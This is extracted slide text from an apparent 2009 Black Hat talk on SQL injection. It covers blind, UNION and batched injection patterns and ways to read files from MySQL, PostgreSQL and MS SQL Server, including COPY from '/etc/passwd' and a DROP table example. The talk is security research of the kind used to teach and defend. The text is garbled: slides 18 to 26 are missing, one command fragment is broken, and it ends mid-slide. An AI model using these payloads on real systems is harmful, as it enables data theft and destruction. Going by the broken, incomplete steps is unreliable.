Sql injection

Advanced SQL injection to operating system full control
Bernardo Damele Assumpção Guimarães

Black Hat Briefings Europe Amsterdam (NL) – April 16, 2009

Who I am
Bernardo Damele Assumpção Guimarães: • • • • Proud father IT security engineer sqlmap lead developer MySQL UDF repository developer

2

SQL injection definition
• SQL injection attacks are a type of injection attack, inwhich SQL commands are injected into data-plane input in order to affect the execution of predefined SQL statements • It is a common threat in web applications that lack of proper sanitization on usersupplied input used in SQL queries
3

SQL injection techniques
• Boolean based blind SQL injection:
par=1 AND ORD(MID((SQL query), Nth char, 1)) > Bisection num--

• UNION query (inband) SQLinjection:
par=1 UNION ALL SELECT query--

• Batched queries SQL injection:
par=1; SQL query;-4

How far can an attacker go by exploiting a SQL injection?

5

Scope of the analysis
• Three database software:
– MySQL on Windows – PostgreSQL on Windows and Linux – Microsoft SQL Server on Windows

• Three web application languages:
– ASP on Microsoft IIS, Windows – ASP.NET on MicrosoftIIS, Windows – PHP on Apache and Microsoft IIS
6

Batched queries
• In SQL, batched queries are multiple SQL statements, separated by a semicolon, and passed to the database • Example: SELECT col FROM table1 WHERE id=1; DROP table2;
7

Batched queries support

Programming languages and their DBMS connectors default support for batched queries
8

File system read access

9

Fileread access on MySQL
• LOAD_FILE() function can be used to read either a text or a binary file • Session user must have these privileges:
– FILE – CREATE TABLE for the support table

10

File read access on MySQL
Via batched queries SQL injection technique:
SELECT HEX(LOAD_FILE('C:/example.exe')) INTO DUMPFILE 'C:/WINDOWS/Temp/hexkflwl'; CREATE TABLE footable(data longtext); LOAD DATAINFILE 'C:/WINDOWS/Temp/hexkflwl' INTO TABLE footable FIELDS TERMINATED BY 'MFsIgeUPsa' (data);
11

File read access on MySQL
Via any SQL injection enumeration technique:
• Retrieve the length of the support table's field value • Dump the support table's field value in chunks of 1024 characters

On the attacker box:
• Assemble the chunks into a single string • Decode it from hex and write ona local file
12

File read access on PostgreSQL
• COPY statement can be used to read a text file
– User-defined function can be used to read a binary file

• Session user must be a super user to call this statement

13

File read access on PostgreSQL
Via batched queries SQL injection technique:
CREATE TABLE footable(data bytea); COPY footable(data) FROM '/etc/passwd';

14

Fileread access on PostgreSQL
Via any SQL injection enumeration technique:
• Count the number of entries in the support table • Dump the support table's field entries base64 encoded via ENCODE() function

On the attacker box:
• Assemble the entries into a single string • Decode it from base64 and write on a local file
15

File read access on MS SQL Server
• BULK INSERT statement can beabused to read either a text or a binary file and save its content on a table text field • Session user must have these privileges:
– INSERT – ADMINISTER BULK OPERATIONS – CREATE TABLE
16

File read access on MS SQL Server
Via batched queries SQL injection technique:
CREATE TABLE footable(data text); CREATE TABLE footablehex(id INT IDENTITY(1, 1) PRIMARY KEY, data VARCHAR(4096)); BULK INSERTfootable FROM 'C:/example.exe' WITH (CODEPAGE='RAW', FIELDTERMINATOR='QLKvIDMIjD', ROWTERMINATOR='dqIgILsFoi');
17

File read access on MS SQL Server
[…] WHILE (@counter > filepath')

• Session user must have CONTROL SERVER privilege • On the attacker box:
– Split the file in chunks of 64Kb – Convert each chunk to its plain text debug script format
27

File write access on MS SQL...